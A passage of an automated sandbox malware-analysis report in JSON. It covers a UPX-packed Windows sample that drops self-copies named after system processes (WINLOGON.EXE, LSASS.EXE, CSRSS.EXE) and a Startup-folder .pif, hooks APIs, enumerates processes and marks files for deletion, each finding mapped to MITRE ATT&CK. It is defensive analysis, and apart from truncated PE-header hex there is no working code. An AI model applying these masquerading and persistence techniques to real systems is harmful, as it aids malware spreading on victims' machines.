\"WINLOGON.EXE\" wrote 46914 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46776 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46992 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46974 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46961 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46880 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46902 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46911 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46763 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46754 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46956 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46766 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46879 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46799 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46817 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46875 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46833 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46799 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46836 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46898 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46825 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46891 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46801 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46723 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46822 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46910 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46876 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46861 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46832 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46918 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C450.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C452.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C88D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C740.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C743.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C889.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has section name UPX1 with entropy \"7.85055163958\"\n \"services.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"shell.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"4k51k4.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"New Folder.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Data HAPUBWS.exe\" has section name UPX1 with entropy \"7.85055163958\"\n \"Empty.pif\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C450.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C452.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C88D.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9C740.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"CSRSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C743.bin\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has a section named \"UPX0\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has a section named \"UPX1\"\n \"services.exe\" has a section named \"UPX0\"\n \"services.exe\" has a section named \"UPX1\"\n \"shell.exe\" has a section named \"UPX0\"\n \"shell.exe\" has a section named \"UPX1\"\n \"4k51k4.exe\" has a section named \"UPX0\"\n \"4k51k4.exe\" has a section named \"UPX1\"\n \"New Folder.exe\" has a section named \"UPX0\"\n \"New Folder.exe\" has a section named \"UPX1\"\n \"Data HAPUBWS.exe\" has a section named \"UPX0\"\n \"Data HAPUBWS.exe\" has a section named \"UPX1\"\n \"Empty.pif\" has a section named \"UPX0\"\n \"Empty.pif\" has a section named \"UPX1\"\n \"WINLOGON.EXE.bin\" has a section named \"UPX0\"\n \"WINLOGON.EXE.bin\" has a section named \"UPX1\"\n \"4K51K4.EXE.67A9C450.bin\" has a section named \"UPX0\"\n \"4K51K4.EXE.67A9C450.bin\" has a section named \"UPX1\"\n \"CSRSS.EXE.bin\" has a section named \"UPX0\"\n \"CSRSS.EXE.bin\" has a section named \"UPX1\"\n \"SERVICES.EXE\" has a section named \"UPX0\"\n \"SERVICES.EXE\" has a section named \"UPX1\"\n \"IEXPLORER.EXE.67A9C452.bin\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToLocalFileTime\" with parameter c6020e51947bdb01 & c66ad2b29c7bdb01 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToLocalFileTime\" with parameter 8efa0d67947bdb01 & 8e62d2c89c7bdb01 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToLocalFileTime\" with parameter f3713667947bdb01 & f3d9fac89c7bdb01 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToLocalFileTime\" with parameter 9003f464947bdb01 & 906bb8c69c7bdb01 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"FileTimeToLocalFileTime\" with parameter 76025367947bdb01 & 766a17c99c7bdb01 (UID: 00000000-00005064)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005064)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"LoadLibraryExW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"Process32NextW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"OpenMutexW@KERNEL32.DLL\" in \"WINLOGON.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked 